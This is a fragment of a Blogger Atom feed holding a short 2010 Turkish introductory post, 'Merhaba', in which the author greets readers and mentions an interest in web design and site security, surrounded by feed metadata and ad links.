/></author><thr:total>0</thr:total><feedburner:origLink>http://vezirist.blogspot.com/2010/06/script-cekme.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEACSXs6eyp7ImA9WxFUF08.&quot;"><id>tag:blogger.com,1999:blog-4818381281339221921.post-1110250955396016911</id><published>2010-06-28T03:53:00.000-07:00</published><updated>2010-06-28T03:59:28.513-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-06-28T03:59:28.513-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="blog" /><category scheme="http://www.blogger.com/atom/ns#" term="04" /><category scheme="http://www.blogger.com/atom/ns#" term="Vezir Blog" /><category scheme="http://www.blogger.com/atom/ns#" term="Vezir.04" /><title>Merhaba</title><content type="html">Merhaba arkadaşlar tüm arkadaşların blogu var bende bir tane blog açayım dedim. Kendim hakkında verebileceğim pek bir bilgi yok ama yinede bir kaç şey yazayım doğubeyazıtlıyım sanal ortamda web tasarımı olsun site güvenliği hakkında kendimi geliştirmeye çalışıyorum. Bazıları gibi kendimi kimseden üstünde görmüyorum kimsenin altında da değilim bu kadar yeter herhalde :D bloguda elimden geldiğince güncel tutmaya çalışacam.&lt;br /&gt;Herşeyin hayırlısı olsun diyip konuyu bitirelim.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4818381281339221921-1110250955396016911?l=vezirist.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/8z3qQfCMxwdmaIWhYx7e2-3uSxI/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/8z3qQfCMxwdmaIWhYx7e2-3uSxI/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/8z3qQfCMxwdmaIWhYx7e2-3uSxI/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/8z3qQfCMxwdmaIWhYx7e2-3uSxI/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/VezirinInternetGnl/~4/teW1mDlm10I" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://vezirist.blogspot.com/feeds/1110250955396016911/comments/default" title="Kayıt Yorumları" /><link rel="replies" type="text/html" href="http://vezirist.blogspot.com/2010/06/merhaba.html#comment-form" title="0 Yorum" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4818381281339221921/posts/default/1110250955396016911?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4818381281339221921/posts/default/1110250955396016911?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/VezirinInternetGnl/~3/teW1mDlm10I/merhaba.html" title="Merhaba" /><author><name>Vezir.04</name><uri>http://www.blogger.com/profile/02406787707276955003</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="24" height="32" src="http://2.bp.blogspot.com/-yqqUABA9vbg/TkZ-wbN81GI/AAAAAAAAACU/Hestb39hh18/s220/268428_10150251053314831_572829830_7105300_7388330_n.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://vezirist.blogspot.com/2010/06/merhaba.html</feedburner:origLink></entry></feed>

